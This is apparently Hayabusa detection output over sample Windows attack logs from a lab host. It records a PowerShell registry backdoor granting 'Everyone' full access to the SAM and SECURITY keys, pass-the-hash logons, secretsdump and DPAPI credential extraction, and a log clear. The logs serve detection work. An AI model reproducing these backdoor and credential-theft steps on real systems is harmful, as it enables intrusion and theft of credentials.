+2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.603 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.627 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.627 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Backdooring completed for system""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""PSObject""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""ComputerName"" ParameterBinding(Add-Member): name=""Value""; value=""FS03"" ParameterBinding(Add-Member): name=""InputObject""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""BackdoorTrustee"" ParameterBinding(Add-Member): name=""Value""; value=""S-1-1-0"" ParameterBinding(Add-Member): name=""InputObject""; value=""@{ComputerName=FS03}""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""@{ComputerName=FS03; BackdoorTrustee=S-1-1-0}""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx
+2021-12-12 15:56:59.657 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"foreach ($s in [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites ){write-host ""[>] (site) $s"";foreach ($r in $s.Subnets){write-host "" └─> (subnet) $r"";foreach ($m in $s.Servers){write-host "" └─> (server) $m""}}}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx"
+2021-12-12 15:56:59.657 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) OFFSEC-PREMISE""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx"
+2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx"
+2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) LONDON""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx"
+2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx"
+2021-12-12 16:15:28.352 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.756 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.817 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8723c99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.829 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:58.454 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x33c | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.709 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.714 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
